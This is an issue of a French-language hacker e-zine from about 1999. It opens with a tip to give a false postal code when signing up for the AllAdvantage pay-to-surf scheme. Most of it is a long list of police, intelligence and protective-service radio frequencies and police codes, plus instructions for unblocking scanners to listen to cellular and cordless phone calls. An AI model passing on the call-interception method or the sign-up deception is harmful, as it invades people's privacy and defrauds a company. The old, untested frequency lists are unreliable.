|( ) Phreak ( ) Hack (X) Autres
'._______Par [ewoks] & Svaik ___  ewoks@pyrofreak.org  & svaik@biosys.net_

Qu'est ce que alladvantage:

	All advantage est une compagnie amricaine vous payant pour surfer 
au tarif de 50 cents U.S. de l'heure c'est  dire environ 70 cents canadien.
Alladvantage existe depuis mars dernier, c'est une entreprise fiable qui a
distribuer pour le mois d'octobre 1999 plus de 30 chques suprieurs a 1000$
(Il y a meme une personne qui a touch un cheque de plus de 4000$US).

	Le grand plus de alladvantage est son systme pyramidal permettant de
rfrencer des personnes sous vous. Vous recevrez $0.10 US pour chacune des 
25 premires heures surfes par chaque personne que VOUS rfrencerez. - 
Vous recevez $0.05 US pour chacune des 25 premires heures surfes par chacun
des rfrencs de vos rfrencs, et ce, jusqu' 4 sous-niveaux :-) ATTENTION
 : les heures de vos rfrencs vous sont payes seulement si vous fates 
autant d'heures qu'eux. Si vous fates vos 25 heures pas de problmes, mais
si vous ne fates que 15 heures par exemple, seules les 15 premires heures
de chacun de vos rfrencs vous seront payes. Alladvantage paye mensuel-
lement ds que le montant accumul est de 20$(Ils envoient les chques entre
le 20 et 30 de chaque mois). Le 3 novembre, AllAdvantage confirmait par 
tlphone  l'mission "Branch" de Radio-Canada qu'elle commenait ds le
mois de novembre  payer ses abonns au Qubec.

Le petit problme de alladvantage au qubec:
Pour le Qubec, AllAdvantage ne distribue pas immdiatement la ViewBar, donc
vous ne commencez pas  faire de l'argent immditament! Cependant, j'ai
dcouvert un truc pour que les gens du Qubec puisse obtenir leur Viewbar
immdiatement lors de l'inscription, donc de faire de l'argent immdiatement!

La marche  suivre:
Pour ceux qui sont dja inscris o qui possde dja la viewbar veuillez vous
dsabonner et effacer toute traces de la viewbar. Pour vous dsabonner vous
n'avez qu'a allez sur le site web de AllAdvantage(alladvantage.com) vous
allez dans MY ACCOUNT vous allez la ->If you are already a member, and would
like to cancel your membership, click here. Ensuite dsinstaller le programme
de la view bar sur votre ordinateur, ensuite rinstallez-le, et 
rinscrivez-vous!

Pour s'inscrire:
Tout simplement en allant a cette adresse http://www.alladvantage.com/
puis cliquer sur "JOIN" une fois rendu sur leur site. Prenez le temps d'y 
lire leur F.A.Q. ("Frequently Asked Questions" ou Foire Aux Questions) dans
la section "How it works", c'est vraiment complet. Pour plus de scurit,
la page o vous vous inscrivez est encrypte. Quand vous aller entrer vos 
coordonnes lors de votre inscription, Entrez le Code Postal suivant au 
lieu du votre! (Inquitez-vous pas, vous pourrez mettre votre vrai code 
postal par la suite, pour qu'ils puissent vous envoyer votre chque$$ ;-) )
K0A 3C0


                            lastnews.forez.com
       -[Dernieres Nouvelles]- La rfrences des nouvelles internet

 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 8-Frquences (The Recueil)
|( ) Phreak ( ) Hack (X) Autres
'._______Par PaToFF ____________________ ______ patoff22@hotmail.com ___
 

	Bon ca y est, c'est encore moi content? J'espre car cet article est 
presque ne bible pour ca le nom de The Recueil qui est en prime avec le 
titre habituel.Et aussi je crois qu'il est assez complet dans le style 
frquences secret police...etc., mais mme a vous checkerer dans les choses 
a venir: que je vais srement refaire un petit bout d'article sur c'est 
sorte de frquence car les tlphones et police...sont srement les plus le 
fun a couter et les plus intressante. Oh aussi.Il y a beaucoup de texte du 
style liste d'picerie ha ha! alors suposment que certain n'aime pas tk on 
n'est pas tous de dieu hein? alors a vous de voir :) So Enjoy!


Bon dans ce mag je vais vous donner(parler) de:
	Les frquences secret de police CIA..etc que j'ai finalement retrouver 
quand mon cousin a renverser sa bire a terre j'ai vu que la revu etait en 
dessous de mon lit chouette n'est ce pas? Et aussi que j'ai trouver sur un 
site que j'ai trouver dans ma revu... Et puis aussi il y a les ondes des 
cellulaires et je vais donner les codes 10 de la SPCUM et redonner quelques 
codes 10 puisque dans les Frquences secrtes ces codes sont donns car il 
m'en manquait quelques un. Et un tas de petites affaires sur les ondes 
(satellite,Sans fil etc...) et aussi un article trouver sur le net par neuro 
qui est a la fin de cette article et qui complte quelques une de mes 
techniques autrement dit une bonne affaire... Et Vous la dedans?

Ne sachant mme pas si quelqu'un a quelque part lis mon article ou vous le 
sautez tous eh. Vous pourriez scanner un peu ca serais bien pareil comme le 
scanne de numro de tlphone si on russirait a trouver des compagnie 
petite ou grosse on pourrais certainement trouver de trs bonne utiliser 
avec cela et si vous participer on affichera tous ca sur le site ou encore 
dans un mag a venir qu'en dites vous? J'Aimerais bien avoir des rponses SVP 
alors n'hsiter pas a m'crire et mme si c'est pour autre choses que cela 
alors je vous souhaite une bonne lecture et
penser a cela... Enjoy it Again!

Notes: Certaine chose(cellulaire dans cet article) sont peut-tre un peu 
dpass et peut-tre quelques une de ces ondes ne sont plus ce quel sont , 
je dirais que cela devrais tre rare sinon veiller me le dire merci.... Et 
aussi je tient a dire que je prend mes infos dans le livre: HARRUTEQ Scanner 
Book, Qubec ditions


Disclamer: Mouin bien vous le savez si vous tes quelqu'un qui a pas 
d'affaire a lire ceci;Police ,GRC etc...passer dont cet article car vous le 
saviez bien que ce n'est que de l'information et rien de plus!

La Loi et les rcepteur a balayage (scanner):
Le Canada est unique en reconnaissant que "le spectre de radio-frequence est 
une ressource vitale publique dont bnficient les possesseurs de permis en 
y ayant accs et en y utilisant les frquences"
De plus ces utilisateurs paient pour leur permis, Augmente les revenus du 
trsor (caliss) en plus de contribuer au plaisir de les cout :). Les 
rglements les plus particulier pour nous sont:


4. (1) Il est interdit, sans une autorisation de radiocommunication et sans 
en respecter les conditions, d'installer de faire fonctionner ou de possder 
un appareil autre:

   (B) Qu'un appareil qui ne peut que recevoir de la radiocommunication et 
n'est pas une entreprise de rception de radiodiffusion.


9. (1) Il est interdit:
   (B) sans excuse lgitime,de gner ou d'entraver la diocommunication.

9. (2) Sauf exception rglementaire, il est interdit d'intercepter et soit 
d'utiliser soit de communiquer toute radiocommunication -- autre que la 
radiodiffusion -- sans l'autorisation de l'metteur.


En d'autre mots:

- Les balayeur sont lgaux ainsi que leur coute.
- Aucune frquence limite -- Pas de permis requis
- Il est interdit d'utiliser les information entendues a des fins 
personnelles
- Il es interdit de divulguer toutes communications entendues...

Pour les aspects techniques veiller vous referez a l'article Scanner D'ondes 
dans Le PyroFreak #8 et pour vous faire une antenne aller voir dans le 
PyroFreak #9 So Enjoy it!

-- Frquences Secrtes --
Bon srement le plus intressant qui je vous le dit jais tirer ca du 
magazine Net-Mag qui ce vend assez cher fak acheter pas ca :) et du site 
trs bon pour frquence:http://hlm.le-village.com/suburban et aussi 
http://altern.org/suburban/ qui je crois est le mme site :) et dans les 
link sur ce site il y a le site de VE2VGA qui a fais le texte qui est plus 
bas... Alors comme vous si savez si on ce donnela peine de chercher un peu 
on peu trs bien trouver quelque chose de bien mme que le gouvernement 
donne ces frquences et plein d'autre truc qui peu nous tre utile c'est ca 
qui arrive quand ya trop de lois et de rglements!

- Frquences de la CIA ,SCRS ,GRC et Police...-
Alors peut-tre si vous avez dj coute des frquences de police vous en 
reconnatrai Et bien sur d'autre que vous savez srement pas :)


Notes: -Frquences souvent codes

Service Canadien du Renseignement de Scurit (SCRS)

421.8875MHz
421.9875MHz
422.0875MHz
421.9375MHz
422.0625MHz
425.7375MHz

                          CIA

     Noms      Frquences      Descriptions
     Able      32.230MHz       WHCA Transportation
    Alpha     166.5125MHz      Escort and security
    Baker     165.7875MHz      Field offices (nationwide)/Pres/VP/VIP Escorts
  Charlie     165.3750MHz      Field offices primary/command post(nationwide)
    Delta     169.9250MHz      WHCA vans / phone patches / Marine Service Detachment
     Echo     407.850MHz       Air Force 1/2 phone patch (uplink)
  Foxtrot     415.700MHz       Air Force 1/2 phone patch (downlink)
     Golf     166.4000MHz      Field offices (nationwide)(Charlie repeater input)
    Hotel     165.6875MHz      WHCA VP staff / White House garage
    Hotel     166.2125MHz      Presidential protection
    Hotel     167.900MHz       WHCA VP staff / White House garage
    India     166.200MHz       Headquarters / Presidential protection
    India     407.925MHz       Headquarters /Presidential protection / Treasury
   Juliet     170.000MHz       Camp David paging
     Kilo     167.825MHz       Presidential residence(LBJ) phone (duplex)
     Lima     168.7875MHz      Presidential residence(LBJ) phone (duplex)
Lavender     418.125MHz       WHCA Transportation
    Mike      165.2125MHz      Former President and dignitary protection
November     166.7000MHz      WHCA White House Staff
    Oscar     164.8875MHz      Presidential protection(primary)
     Papa     164.4000MHz      Field offices / White House perimeter patrols
   Quebec     166.7000MHz      White House staff
   Romeo      166.4000MHz      X-Ray repeater input
   Sierra     165.5125MHz      WHCA White House Staff / pagers
    Tango     164.6500MHz      Field offices / Pres/VP protection
  Uniform     165.0875MHz      AF1 Communications
  Uniform     361.600MHz       AF1 Communications
   Victor     164.1000MHz      WHCA Pres/VP protection
  Whiskey     167.0250MHz      Paging
    X-ray     166.4625MHz      Treasury common
   Yankee     162.6875MHz      Air Force 1/2 phone patch (uplink)
     Zulu     171.2875MHz      Air Force 1/2 phone patch (downlink)


   Noms      Sortie       Entre           Descriptions
  Green      415.750MHz   407.875MHz       Training division
  Black      415.100MHz   418.325MHz       Training division
   Blue      414.800MHz   ---              Training/protective support divisions
Violet      415.875MHz   ---              Training division
   Gray      415.800MHz   ---              Protective support division
   Gold      415.675MHz   419.075MHz       Communications division
  Black      415.675MHz   ---              Executive protection division
Orange      414.950MHz   ---              Executive protection division
    Tan      414.850MHz   ---              Foreign Mission divisions
  Brown      414.850MHz   418.800MHz       Uniformed division
    Red      415.975MHz   419.725MHz       Foreign Mission/Uniformed divisions
Silver      415.650MHz   419.100MHz       Foreign Mission/Uniformed divisions
   Gray      418.350MHz   407.750MHz       Uniformed division
Orange      418.775MHz   414.950MHz       Uniformed division
Yellow      414.675MHz   418.150MHz       Uniformed/Technical security divisions
  Green      419.725MHz   ---              Technical security division

              Technical security division (usage spcial)

          NOMS                  FRQUENCES                DESCRITIONS
            F1                  408.000 MHz               RF Alarm
            F2                  411.000 MHz               RF Alarm
            F3                  408.500 MHz               Tracker (F1)
            F4                  408.975 MHz               Tracker (F2)

               Microphones sans-fil (radios portables)
                #                    FRQUENCES
                1                    406.2625 MHz
                2                    407.825 MHz
                3                    407.875 MHz
                4                    407.975 MHz

         Presidential Nighthawk Aircraft Fleet (HMX)
            Frquences             Descriptions
            46.750 MHz             Helicopter ops/transport (primary)
            46.700 MHz             Helicopter ops (secondary)
            46.800 MHz             Helicopter ops (alternate)
            34.350 MHz             VIP transport net
           375.000 MHz             Transport
           142.750 MHz             Command post
           265.800 MHz             Squadron common

                   Limousines (local-DC) (duplex)
               Entre                  408.450 MHz
               Sortie                  407.850 MHz



                               FREQUENCE DE LA SQ


F1:  166.800MHz
F2:  166.500MHz
F3:  167.040MHz
F4:  166.620MHz
F5:  167.010MHz
F6:  166.740MHz
F7:  167.340MHz
F8:  166.680 MHz
F9:  166.830 MHz
F10: 166.650 MHz
F11: 166.635 MHz
F16: 152.510 MHz
F17: 152.525 MHz
F18: 152.540 MHz
F20: 154.220 MHz
F21: 154.680 MHz
F23: 154.740 MHz
F25: 153.920 MHz

Frquences:          Description:

166.8300 MHz         Poste St-Romuald, Rive sud
167.0100 MHz         Poste Quebec-Metro, Rive nord
166.5000 MHz         Poste St-Anne Beaupre et Porneuf
167.0400 MHz         Quartier general et urgence
166.6800 MHz         Quartier general
166.8000 MHz         Quartier general

Notes: Ces frquences sont rgulirement brouiller

410.8125 MHz         Groupe Tactique D'intervention
411.4625 MHz         Groupe Tactique D'intervention
411.5125 MHz         Groupe Tactique D'intervention
413.0125 MHz         Groupe Tactique D'intervention

Notes: Ces frquences sont utiliser lors d'opration d'envergure comme celles du groupe
       Tactique d'Intervention

171.1800 MHz         Auto Patrouille, service radar
172.0200 MHz         Walkie-talkie


- Leurs portatifs
Rcepteur 1 a 3
454.475MHz
454.550MHz
454.400MHz

- Frquence de leurs Hlicoptre
154.980MHz

- Les frquences de la SPCUM -
1- 1:  410.1125MHz (district 11 a 15 et 21-22)
1- 2:  410.2526MHz (auxiliaire)
1- 3:  410.3625MHz (district 23-24-25-32-33-34)
1- 4:  410.4875MHz (1-31-43-44)
1- 5:  410.6125MHz (district 45-51-52-53-54-55)
1- 6:  410.7875MHz (auxiliaire)
1- 7:  410.9125MHz (gnral)
1- 8:  410.6625MHz (simplex)
1- 9:  412.6875MHz (oprations spciales)
1- 10: 411.3125MHz (oprations spciales)
1- 11: 412.1375MHz (oprations spciales)
1- 12: 410.0125MHz (oprations spciales)

4- 1: 411,1875 MHz (centre oprationnel)
4- 2: 418,2125 MHz (surveillance physique)
4- 3: 411,5375 MHz (groupe tactique)
4- 4: 418,7375 MHz (surveillance physique)
4- 5: 418,7875 MHz (surveillance physique)
4- 6: 418,1875 MHz (surveillance physique)

Communications numriques (4800 bps sur terminaux MDI) (Pas sur de la vitesse si est bonne!)
D1: 410,0375 MHz
D2: 410,3375 MHz
D3: 410,8125 MHz
D4: 411,2125 MHz

411.4375 MHz (Scurit de la STCUM (C.O.S) Transit security)
411,2375 MHz (Mesures d'urgences (BMU) Emergency measures)












- Frquences de l'arme canadienne -
34.700MHz
38.600MHz
38.900MHz



                                       GRC

Les Frquences de la GRC sont gnralement dans les bandes 139 et 140MHz

Frquences:               Descriptions:
139.1400MHz               Utilisation locale seulement
139.1700MHz               Utilisation locale seulement
139.7100MHz               Utilisation gnrale
139.7400MHz               Utilisation locale seulement
139.8000MHz               Utilisation gnrale
139.8300MHz               lien avec Mont Magantic

139.9800MHz               Scurit aroport de Qubec
461.0750MHz               Urgence aroport de Qubec

140.3700MHz               Utilisation locale seulement
140.6700MHz               Utilisation locale seulement
140.7600MHz               Utilisation gnrale
422.0875MHz               Utilisation gnrale


                                    POLICE


Notes: Ces frquences sont un peu veille et je les ai pas tester alors
       a vous de checker de toute faon ils devraient toute marcher
       peut-tre  part les voirie

EXTERIEUR REGION DE QUEBEC:

Villes:            Description:             Frquences:

Baie St-Paul       Pompier                  154.3250MHz
                   Voirie                   159.2100MHz

Beauceville        Voirie                   167.0400MHz

Black Lake         Police et Pompier(same)  154.175/154.8600MHz
                   Voirie                   169.2600MHz

Clermont           Police et pompier(same)  154.6500MHz
                   Voirie                   169.2300MHz

Cowansville        Pnitencier Fdral      151.5200MHz
                                            150.6050MHz
                                            149.8300MHz

Deschaillons       ---                      ---

Disraeli           Police                   158.9700MHz
                   Pompier et Voirie(same)  159.1200MHz

Donnacona          Police et Pompier(same)  158.9700MHz
                   Voirie                   169.4400MHz
                   Pnitencier Fdral      151.5200MHz
                                            150.6050MHz
                                            149.83/167.550MHz

Dosquet            Voirie                   155.6400MHz

Lac Etchemin       Pompier et Voirie(same)  168.7800MHz

Laval              Pnitencier              151.055/151.4750MHz

Lyster             Pompier et Voirie(same)  159.4500MHz

Malbaie            Police et Pompier(same)  151.2350MHz
                   Voirie                   167.4500MHz

Montmagny          Police et Pompier(same)  158.9700MHz --|
                   Voirie                   169.1400MHz --|
                                                          |---> Same? comme plusieur autre...
Neuville           Pompier et Voirie(same)  155.1900MHz   |
                                                          |
Plessisville       Police et Pompier(same)  158.9700MHz --|
                   Voirie                   169.1400MHz --|

Port-Cartier       Pnitencier Fdral      150.6050MHz
                                            149.8300MHz
                                            151.5200MHz

Portneuf           Voirie                   169.2300MHz

St-Agapit          Police et Pompier(same)  153.9500MHz

St-Damien          Pompier et Voirie(same)  169.2300MHz

St-Etienne         Pompier et Voirie(same)  169.2300MHz

St-Georges         Police Est               158.9700MHz
                   Police Ouest             158.8200MHz
                   Pompier                  158.9700MHz
                   Voirie                   169.08/164.9400MHz
                   Officiel                 169.86/169.9400MHz

St-Joseph          Police et Pompier(same)  154.2950MHz
                   Voirie                   169.5000MHz

St-Marc-des-       Pompier                  164.9400MHz
Carrieres          Voirie                   164.9400MHz

Ste-Anne-des-      Pnitencier              151.475/413.9375MHz
plaines



Ste-Croix          Voirie                   143.0250MHz

Ste-Marie          Police et Pompier(same)  154.2650MHz
                   Voirie                   158.9850MHz
                   Officiel                 153.8900MHz

St-Michel          Police(SQ)               166.8000MHz

St-Raymond         Police et Pompier(same)  154.0400MHz
                   Voirie                   269.0500MHz

Thetford Mines     Police et Pompier(same)  412.9750MHz
                   Voirie                   169.9750MHz
                   Officiel                 154.65/155.7600MHz

REGION DE QUEBEC:

Villes:            Description:             Frquences:

Ancienne-Lorette   Police et Pompier(same)  151.1450MHz
                   Voirie                   169.3500MHz

Beauport           Police et Pompier(same)  155.280/155.6100MHz
                   Voirie                   169.7400MHz

Beaupre            ---                      ---

Berniere           Pompier                  151.2650MHz

Boischatel         Pompier et Voirie(same)  151.2650MHz

Canadien National  Police                   160.5750MHz

Canadien Pacifique Police                   159.8850MHz

Cap-Rouge          Police et Pompier(same)  -Voir St-Foy-
                   Voirie                   169.4700MHz

Charlesbourg       Police                   412.1125/412.8125MHz
                   Pompier                  154.8300MHz
                   Voirie                   169.4700MHz

Charny             Police et Pompier(same)  154.1300MHz
                   Voirie                   168.7800MHz

Chateau-Richer     Voirie                   159.2700MHz

Lac Beauport       Pompier et Voirie(same)  151.5350MHz

Lac St-Charles     Pompier                  155.1900MHz

Lauzon             Police et Pompier(same)  412.3875MHz
                   Voirie                   169.1700MHz

Levis              Police                   412.9875MHz
                   Pompier                  413.5125MHz
                   Voirie                   169.440/.140/.230MHz

Loretteville       Police                   412.9625MHz
                   Pompier                  412.5875MHz
                   Voirie                   151.235/413.4875MHz

Port de Quebec     Police                   154.4000MHz
                   Voirie                   167.6100MHz

Quebec             Police                  r:155.5800MHz
                                          g1:155.7900MHz
                                          g2:155.4000MHz
                                          e1:155.8500MHz
                                          e2:155.1300MHz
                                           f:155.8800MHz
                                          rs:154.7100MHz
                                          fs:154.7700MHz
                   Pompier                   154.250/155.520/154.340MHz
                   Voirie                    169.890/169.590MHz

St-Augustin        Pompier                   410.0125MHz
                   Voirie                    168.7800MHz

St-Ferreol des     Voirie                    163.5000MHz
neige

St-Romuald         Police                    154.6500MHz
                   Pompier et Voirie(same)   155.0400MHz

Ste-Foy            Police et Pompier(same)   412.3125/412.9125MHz
                                             413.3125MHz
                   Voirie                    169.110/169.5300MHz

Shannon            Pompier et Voirie(same)   173.46/.64/.82MHz

Sillery            Police et Pompier(same)   155.9700MHz
                   Voirie                    410.0375MHz

Stoneham           Pompier et Vorie(same)    143.0250MHz

Universite Laval   Securite                  159.3000MHz

Val-Belair         Police                    ???
                   Pompier                   412.4875MHz
                   Voirie                    411.6875MHz

Valcartier         Police                    173.2500MHz
Base Millitaire    Pompier                   173.460/173.3500MHz
                   Voirie                    173.6700MHz

Valcartier Village Pompier et Voirie(same)   170.9400MHz

Vanier             Police et Pompier(same)   412.0125MHz
                   Voirie                    410.0875MHz

Village Huron      Police                    154.9200MHz
                   Pompier et Voirie(same)   -Voir Loretteville-


Bon ca a peu prs ca pour les frquences "Secrtes" comme vous avez du 
constater c'est pas si secret que cela!! Pareil que les site Internet 
secrets que vous verrez ou que vous avez dj vu dans ce mag.

- Conclu -
Sur le site (http://hlm.le-village.com/suburban/) vous pourrez voir d'autre 
codes 10 et vous verrez que la SPCUM et la SQ sont assez diffrent comme 
vous savez :) aussi il y a plein d'autre frquences arme cinma hpitaux et 
autre...
Il y a aussi de plan d'intercepteur-dcodeur de pagette que je vous donnerai 
peut-tre la prochaine fois
                                              Press Down (to continu)


-- Codes 10 Corriger et SPCUM en prime --
C'est les codes du dernier mag mais j'en ai rajouter quelques un que j'avais
pas dans ceux de la SQ et j'ai laisser la RCMP la juste comme cela :)

Sret:                                RCMP:
10-1 A l'coute                        10-4 message compris
10-2 Rpter votre message             10-5 en attente (stand-by)
10-3 Canceller                         10-7 hors des ondes
10-4 Message compris (terminer)        10-8 retour en ondes
10-5 Accident matriel                 10-9 rpter
10-6 Accident avec blesser , mort      10-12 en route
10-7 Hold-up                           10-20 en position
10-8 Barrage routier(Road Block)       10-21 appeler par tlphone
10-9 Position et direction             10-27 vrification permis de conduire
10-10 Message gnral                  10-28 vrification immatriculation
10-11 Immobilisez vhicule et prenez   10-29 vrification de dossier
      message                          10-45 retour au bureau
10-12 Individu                         10-99 portatif
10-13 Appelez par tlphone
10-14 Besoin d'assistance
10-15 Message confidentiel
10-16 Rapport prliminaire
10-17 tat des routes
10-18 Hors des ondes + (la ou les raison)
10-19 Retour en ondes
10-20 Repas (Donner numro de tlphone)
10-21 Tlphone
10-22 Enqute
10-24 Appelez au quartier gnral
10-25 Repas
B.F.C Bureau des enqutes criminelles
B.S.R Bureau de la scurit routire
D.P.J Directeur de la protection Jeunesse
ERAM Escouade Alcool & Moralit
DBO Demande de vrification d'objet
DVQ Demande au Bureau Vhicules du Qc
DVQ#1 vrification par plaque
DVQ#2 vrification par le nom + date de naissance
DVQ#3 vrification pour dossier
DVQ#4 vrification par numro de srie
DPE Vrification de dossier
DPL Vrification de plaque
FPS Dossier criminel

-SQ code 100-
20 Opration cent
21 Priorit radio
22 Silence radio
23 Communication en simplex
24 Opration termine
25 Opration poursuivie
26 Interceptez Vhicule suspect
27 Agir avec prudence
28 Sans sirne ni clignotant
29 Demande renfort
30 URGENCE
31 Fusillade
32 Vol a main armer
33 Personne juge dangereuse
34 Enlvement
35 vasion
36 Prise D'otage(s)
37 meute
38 Alerte a la bombe
39 Dsastre arien
40 Homicide
41 Incendie
42 Attroupement Illgal
43 Dlit de fuite
44 Facilites affaiblies
45 Transport de dtenu(s)


SPCUM:

Requtes informatises (partiel)

BVQ: (type 1) par immatriculation
BVQ: (type 2) par le nom
BVQ: (type 3) par permis de conduire
BVQ: (type 4) par numro de srie
COM: Message au C.I.P.C.
DAF: Vrification au fichier d'armes  feu
DBA: Vrification au fichier des bateaux
DBO: Vrification au fichier des objets
DDE : Vrification au fichier personnes par la fiche dentaire
DMO: Vrification au fichier des bateaux moteur
DPE: Vrification au fichier des personnes
DPI: Vrification au fichier des pices
DVA: Vrification au fichier des valeurs
DSV: Demande spciale au fichier des vhicules
DVQ: Demande au bureau des vhicules du Qubec
FPS: Vrification au fichier des dossiers judiciaires ou criminels
MEUR: Message urgent  transmettre (terminaux MDI)


Codes 10 du SPCUM

10-01: Essence/huile
10-02:Repas
10-03: Rparation mcanique
10-04:Rparation radio
10-05: En service
10-06: Rpter dernier message
10-07:Besoin d'aide - urgent
10-08: Hors service
10-09:Donner votre position
10-10: Annuler message / appel
10-11: En route
10-12: Sur les lieux
10-13:Transport de dtenu
10-14: Pratique de tir
10-15: Lavage de vhicules
10-16: Message
10-17: Remorquage requis
10-18 ou 10-19: Administration (appelez au poste)
10-19: Appelez votre poste
10-20: Accident
10-21: Uniforme
10-24: Agir avec prudence
10-25: Peut parler librement? (infos confidentielles)
10-26:
10-27: possible "changez canal 7 "
10-36: Canceller 10-37
10-37: Bouton Panique terminaux et walkie-talkie

Codes gnralement utiliss par le SPCUM

Abrviations:

BL - Blesss
EL - lections (nouveau depuis 1995)
IV - Ivresse
MM - malade mental
SA - suspect arm
SP - suspect possible
SF - suspect en fuite
SU- suspect sur les lieux
VC - Violence conjugale
X,XE - jeune enfant


Classification des codes

001: Homicide Meurtre
006: Homicide Tentative
014:
018: Vol qualifi
021: Vol sur la personne
022: Introduction par effraction
026: Vhicule Vol
032: Bicyclette vole
033: Vol dans vhicule
034: Vol  l'talage
035: Vol Autres
037: Vol de bicyclette
041: Recel
042: Fraudes
050: Jeu et paris
054: Personne arme
055: Explosifs trouvs
061: Personne recherche
063: Troubler la paix
064: vasion
065: Actions indcentes
071: Mfaits, biens privs
072: Mfaits, biens publics
073: Infraction au code criminel
111: Accident Dlit de fuite
116: Capacit conduire affaiblie
204: Agression sexuelle
211: Voies de fait contre agent
212: Voies de fait
214: Prise d'otages
222: Visites de contrle
250: meute
255: Explosion
316: Ivressomtre
333: Information/cas rfr
400: Alarme sans prcision
401: Alarme cambrioleur
402: Alarme hold-up
403: Alarme non fonde
404:
407: Assistance  huissier
409: Coup de feu
410: Semblerait tre variante de 409
426:Vhicule sans permis
444: Enqute - lieux publics
445: Enqute - lieux privs
455: Substance dangereuse
465: Rencontrer dpanneuse
481: Enfant abandonn ou maltrait
486: Excavation dangereuse
491: Fil bris (RC avec Hydro-Qubec)
492: Drogue et stupfiants
499: Non fond
555: Radar ("patrouille mixte")
600: Billet de circulation
601: Contrle de circulation
607: Appel  la bombe
608: Colis suspect trouv
609: Bruit
610: Conflit
611: Manifestation
612: Diffrent ouvrier
613: Cooprer/rencontrer
615: Incendie
616: Personne  expulser
617: Personne dans le besoin
618: Personne gare
619: Personne malade mental (MM)
620: Personne  aviser
621: Personne gisante
622: Garde de dtenu
626: Vhicule abandonn
630: Dommage  la proprit
631: Morsure d'animal
632: Animal mort, perdu, bless
638: Bagarre
640: Plaque perdue/vole

641: Plaque trouve/retrouve
643: Objet perdu
644: Objet trouv/retrouv
645: Menace/harclement
655: Fuite de gaz
699: Non localis
807: 10-07 transmis par tiers
901: Personne blesse/malade
902: Dcs
903: Disparition rapport
905: Accident
907: Assistance ...
922: Tentative de suicide
923: Personne disparue localise
933:Info d'intrt policier
926: Vhicule retrouv
944: Poursuite active (code retir?)
973 :Autre incident
999: Police demande sans prcision


-- Les ondes et les cellulaires ,Sans fil ET + --
Notes: Tout ou presque ceci peux ce relier au ondes a la fin de l'article 
(Tlphone)

Les ondes des tlphones cellulaires on les retrouves dans la bande 800Mhz. 
Plusieurs scanner peuvent capter ces frquences. Car certains modle sont 
modifier par le fabriquant pour bloquer la rception de ces frquences.Mais 
il est possible de dbloquer la rception des cellulaires sur la plupart des 
modles modifier. Vous avez juste a vous informer a votre vendeur ou chez 
Radio Shack quelque part comme ca, il vont vous le dire. Si vous ne voulez 
pas investir pour le faire modifier ou le faire vous mmes le truc des 
frquences image s'applique ici (PyroFreak #8). Additionner le numro 
magique et le tour est jouer! Si votre appareil n'est pas fabriquer pour la 
bande 800Mhz il en est impossible de le modifier.

Tout n'est pas perdu il existe des convertisseurs de frquences avec 
lesquels vous serez capable de capter la bande 800Mhz. Ils se connectent 
entre le rcepteur et l'antenne. En gnral il suffit d'ajouter 400Mhz dont 
pour capter la frquence 855.0000, il faudra programmer 455.0000 . 
L'inconvnient de ce systme est que si un signal est mis a 455.0000 est 
capter par l'appareil, il peut devenir ennuyant couter deux conversations a 
la fois. Les convertisseurs sont annoncer dans les magasins spcialiser et 
chez les vendeur de scanner.


Il y a quelques annes(vu de la date de mes infos :) ) Au tat et au Canada 
il y avais environ 832 frquences alloues pour le services de tlphone 
cellulaires et d'autre frquences additionnels sont prvues pour le futur. 
Le systme de contrle par ordinateur choisit une paire de frquence (mobile 
et base), la meilleur parmi chacune des 416 frquences de Bell cellulaire ou 
Cantel & Cie. Ainsi le signal faiblit , l'ordinateur interroge les cellules 
environnantes pour transfrer la conversation sur une autre paire de 
frquences qui capte mieux le signal. Tout cela ce fait en une fraction de 
seconde sans que la conversation ne soit interrompue. La base transmet les 
deux cotes de la conversation (mobile et base), ce qui peut surprendre les 
usagers de ce systme. Beaucoup de gens sont sur l'impression que les 
conversations a partir de tlphones cellulaires sont totalement prives et 
qu'il est interdits de les couter. Ce qui n'est vraiment pas le cas. Une 
autre affaire que les usager nesavent pas non plus des propritaire de 
tlphones cellulaires c'est qu il est interdit d'utiliser un langage 
obscne ou discriminatoire sur les ondes publiques. La pnalit pour une 
telle offense est de 1'000$ ou 6 mois de prison.(Caliss que ces mal faites 
la justice ca ce peut pas!)Mme que la GRC a dj faites des saisis un peu 
partout au Canada. Mais vous ne pouvez avertir personne car il est interdit 
de divulguer ce qu'on entends sur les ondes... Et mme il y a des scanners 
qui on des plug pour mettre une enregistreuse qui s'active a chaque fois 
quelle entend une voix alors ceci peut tre trs mais trs intressant :)


Et aussi il est possible que si vous pouvez capter une frquence et 
cellulaires que la personne qui a le cellulaire puisse le savoir alors peut-
tre que des compagnies monte des ti coup monte comme donner des "bon 
tuyaux" pour tel ou tel affaire et vous pouvez vous faire avoir si vous vous 
rendez compte que ca existe pas ou que vous faites beaucoup d'argent et 
blablabla...

Bon alors pour pouvoir capter des frquences de tlphones cellulaires, 
scanner dans les 80Mhz et quand vous capter une frquence vous l'inscrivez 
dans une de vos mmoire et quand vous couter cette frquence et que les 
ondes coupe alors peser sur search pour retrouver la mme frquence qui a 
changer de place comme je lai expliquer plus haut... d'habitude les 
frquences seront espacer d'environ 30 ou 45 Mhz.


Alors je vais vous donner quelques frquences de cellulaire en plus que ceux 
de VE2VGA qui ce retrouve plus loin...


Alors la compagnie Cantel ces ondes se situe environ:
de 825.030MHz a 834.990MHz en mobile
de 870.030MHz a 879.990MHz en base

Et Bell:
de 835.020MHz a 844.980MHz en mobile
de 880.020MHz a 889.980MHz en base

Comme je le disais plus haut pour trouver ces frquence un calcul ce fais. 
En mobile ou en base 30KHz sparent les canaux et entre les mobile et la 
base 45MHz

(Pour le canal 30: 30 fois 30KHz = 900KHz)
mobile: canal 30 825MHz + 900KHz = 825.900MHz
base:   canal 30 825MHz + 45MHz + 900KHz = 870.900MHz
L'coute doit ce faire sur la base

D'habitude les 21 premier canaux sont rserver pour des information crypter
donc illisible et servent srement a la compagnie...

Pour le satellite MSAT les frquences sont:
Frquences D'entres: 821MHz a 825MHz
Frquences de sortie: 866MHz a 870MHz

- Bon alors je le tlphone sans fils -
Le tlphone sans fil se retrouve dans les 40MHz...Depuis 1984 cette bande 
est utiliser et avant cela les frquences se situaient entre 1.6 et a.8MHz


Combine:      Base:   Canaux:
49.670        46.610  01
49.770        46.710  04
49.830        46.770  06
49.830        1600Khz avant 1984
49.845        46.630  02
49.845        1710KHz 07 --- avant 1984
49.860        46.670  03
49.860        1730KHz 13 avant 1984
49.875        46.730  05
49.875        1750KHz 19 avant 1984
49.890        46.830  07
49.890        1770KHz 25 avant 1984
49.930        46.870  08
